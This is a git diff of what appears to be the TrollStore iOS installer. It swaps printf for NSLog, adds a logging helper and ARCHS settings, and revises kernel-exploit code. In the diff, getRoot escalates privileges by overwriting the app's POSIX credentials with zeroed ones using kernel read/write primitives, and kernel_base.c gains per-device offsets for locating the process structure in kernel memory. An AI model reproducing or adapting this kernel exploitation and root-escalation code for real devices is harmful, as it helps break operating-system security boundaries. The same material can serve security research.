diff --git a/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj b/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj index f72ac1e..0fa663d 100644 --- a/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj +++ b/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj @@ -388,6 +388,10 @@ 8CE2BD3A28AD5D730058FBAD /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { + ARCHS = ( + arm64e, + arm64, + ); ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; CODE_SIGN_STYLE = Automatic; @@ -421,6 +425,10 @@ 8CE2BD3B28AD5D730058FBAD /* Release */ = { isa = XCBuildConfiguration; buildSettings = { + ARCHS = ( + arm64e, + arm64, + ); ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; CODE_SIGN_STYLE = Automatic; diff --git a/Installer/TrollInstaller/TrollInstaller/ViewController.m b/Installer/TrollInstaller/TrollInstaller/ViewController.m index ec2d4c0..c963cfc 100644 --- a/Installer/TrollInstaller/TrollInstaller/ViewController.m +++ b/Installer/TrollInstaller/TrollInstaller/ViewController.m @@ -16,6 +16,17 @@ extern uint64_t g_self_proc; +void badLog(const char* a, ...) +{ + va_list va; + va_start(va, a); + NSString* af = [NSString stringWithUTF8String:a]; + NSString* msg = [[NSString alloc] initWithFormat:af arguments:va]; + va_end(va); + NSLog(@"%@",msg); + return; +} + int runBinary(NSString* path, NSArray* args) { NSMutableArray* argsM = args.mutableCopy; @@ -63,7 +74,7 @@ gid_t backup_groupList[200]; int getRoot(void) { - printf("attempting to get root...\n"); + NSLog(@"attempting to get root...\n"); usleep(1000); backup_groupSize = getgroups(200, &backup_groupList[0]); @@ -71,19 +82,19 @@ int getRoot(void) backup_cred = proc_get_posix_cred(g_self_proc); struct k_posix_cred zero_cred = {0}; - printf("setting posix cred to zero cred...\n"); + NSLog(@"setting posix cred to zero cred...\n"); usleep(1000); proc_set_posix_cred(g_self_proc, zero_cred); int err = setgroups(0,0); if(err) { - printf("setgroups error %d\n", err); + NSLog(@"setgroups error %d\n", err); usleep(1000); } int uid = getuid(); - printf("getuid => %d\n", uid); + NSLog(@"getuid => %d\n", uid); usleep(1000); return uid; @@ -135,6 +146,9 @@ int writeRemountPrivatePreboot(void) - (void)doInstallation { + NSLog(@"TrollStore out here, exploitation starting!"); + usleep(1000); + [self updateStatus:@"Exploiting..."]; // Run Kernel exploit @@ -151,6 +165,9 @@ int writeRemountPrivatePreboot(void) km.kwrite_64 = kwrite64; km.kcleanup = exploitation_cleanup; + NSLog(@"Exploitation finished, post exploit stuff next!"); + usleep(1000); + [self updateStatus:@"Getting root..."]; // Get root diff --git a/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c b/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c index cd6d46c..5c40f51 100644 --- a/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c +++ b/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c @@ -9,6 +9,9 @@ #include #include #include +#include + +extern void badLog(const char*, ...); uint64_t g_self_proc = 0; @@ -46,7 +49,25 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr) uint64_t x68 = xpaci(kread64(kmsg + 0x68)); uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50)); uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30)); - g_self_proc = xpaci(kread64(self_task + 0x3c8)); + + struct utsname u; + uname(&u); + uint64_t off_task_bsd_info; + +#if __arm64e__ + if (strstr(u.machine, "iPhone14,")) + { + off_task_bsd_info = 0x3c8; // ios15.1 a15 // proc_t::task_bsd_info + } + else + { + off_task_bsd_info = 0x3b8; //; iOS15.1 a12 // proc_t::task_bsd_info + } +#else + off_task_bsd_info = 0x3A0; +#endif + + g_self_proc = xpaci(kread64(self_task + off_task_bsd_info)); // find kernel base uint64_t pos = (fops & ~0x3FFF);